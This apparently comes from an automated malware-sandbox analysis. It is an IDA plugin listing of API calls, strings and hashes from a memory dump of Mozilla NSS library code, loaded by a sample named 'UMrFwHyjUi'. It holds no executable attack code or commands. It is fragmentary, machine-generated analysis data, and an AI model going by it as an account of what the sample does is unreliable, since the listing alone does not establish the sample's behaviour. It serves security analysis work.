                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                            • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                            • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                            • Opcode ID: 2047a76584fe209874eb372e6071a7015ec72c7ca62a097849108b5311706c83
                                                                                                                                                                                                                            • Instruction ID: 73892f838d6cbea2891cf4fb2cd21998a31bba6dec76dab9ecdf81ba8847a15f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2047a76584fe209874eb372e6071a7015ec72c7ca62a097849108b5311706c83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E5170B1E001455BDF109F76EC41AAE7AB9EF95358F244029E809EBB01F731D915CBE2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CBA2DEC
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CBA2E00
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E2B
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E43
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000,?), ref: 6CBA2E74
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000), ref: 6CBA2E88
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EC6
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EE4
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EF8
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA2F62
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA2F86
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA2F9E
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA2FCA
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA301A
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA302E
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA3066
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA3085
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA30EC
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA310C
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA3124
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA314C
                                                                                                                                                                                                                              • Part of subcall function 6CB89180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB8918D
                                                                                                                                                                                                                              • Part of subcall function 6CB89180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB891A0
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA316D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3383223490-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CBA6943
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CBA6957
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CBA6972
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CBA6983
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CBA69AA
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CBA69BE
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CBA69D2
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CBA69DF
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CBA6A5B
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6D8C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6DC5
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6DD6
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6DE7
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6E1F
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E4B
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E72
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EA7
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EC4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6ED5
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6EE3
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EF4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F08
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6F35
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F44
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F5B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6F65
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6F90
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6FC5
                                                                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6CBA6FF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1304971872-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4C4C
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4C60
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CA1
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CBE
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CD2
                                                                                                                                                                                                                            • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D3A
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D4F
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4DB7
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4DD7
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4DEC
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4E1B
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E2F
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4E5A
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E71
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA4E7A
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4EA2
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4EC1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4ED6
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4F01
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA4F2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 759471828-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB75DEC
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CB75E0F
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CB75E35
                                                                                                                                                                                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6CB75E6A
                                                                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CB75EC3
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CB75ED9
                                                                                                                                                                                                                            • SECKEY_SignatureLen.NSS3(?), ref: 6CB75F09
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CB75F49
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB75F89
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB75FA0
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB75FB6
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB75FBF
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB7600C
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB76079
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB76084
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB76094
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Digest), ref: 6CB96D86
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96DB4
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96DC3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB96DD9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB96DFA
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB96E13
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CB96E2C
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CB96E47
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CB96EB9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                                                                                                                                                            • API String ID: 1003633598-2270781106
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_LoginUser), ref: 6CB99C66
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB99C94
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB99CA3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB99CB9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CB99CDA
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB99CF5
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB99D10
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CB99D29
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CB99D42
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                                                                                                            • API String ID: 1003633598-3838449515
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000080), ref: 6CC79C70
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79C85
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CC79C96
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB521BC), ref: 6CB4BB8C
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CA9
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CC29946
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAE16B7,00000000), ref: 6CC2994E
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: free.MOZGLUE(00000000), ref: 6CC2995E
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CB9
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CC9
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CC79CDA
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB4BBEB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CB4BBFB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: GetLastError.KERNEL32 ref: 6CB4BC03
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CB4BC19
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: free.MOZGLUE(00000000), ref: 6CB4BC22
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(?), ref: 6CC79CF0
                                                                                                                                                                                                                            • PR_NewPollableEvent.NSS3 ref: 6CC79D03
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_CallOnce.NSS3(6CCC14B0,6CC6F510), ref: 6CC6F3E6
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_CreateIOLayerStub.NSS3(6CCC006C), ref: 6CC6F402
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_Malloc.NSS3(00000004), ref: 6CC6F416
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CC6F42D
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_SetSocketOption.NSS3(?), ref: 6CC6F455
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CC6F473
                                                                                                                                                                                                                              • Part of subcall function 6CC29890: TlsGetValue.KERNEL32(?,?,?,6CC297EB), ref: 6CC2989E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CC79D78
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79DAF
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC79EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79D9F
                                                                                                                                                                                                                              • Part of subcall function 6CB4B3C0: TlsGetValue.KERNEL32 ref: 6CB4B403
                                                                                                                                                                                                                              • Part of subcall function 6CB4B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CB4B459
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC7A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79DE8
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79DFC
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC7A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79E29
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79E3D
                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CC79E71
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CC79E89
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4254102231-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CB94CF3
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB94D28
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D37
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB94D4D
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB94D7B
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D8A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB94DA0
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CB94DBC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CB94E20
                                                                                                                                                                                                                            Similarity
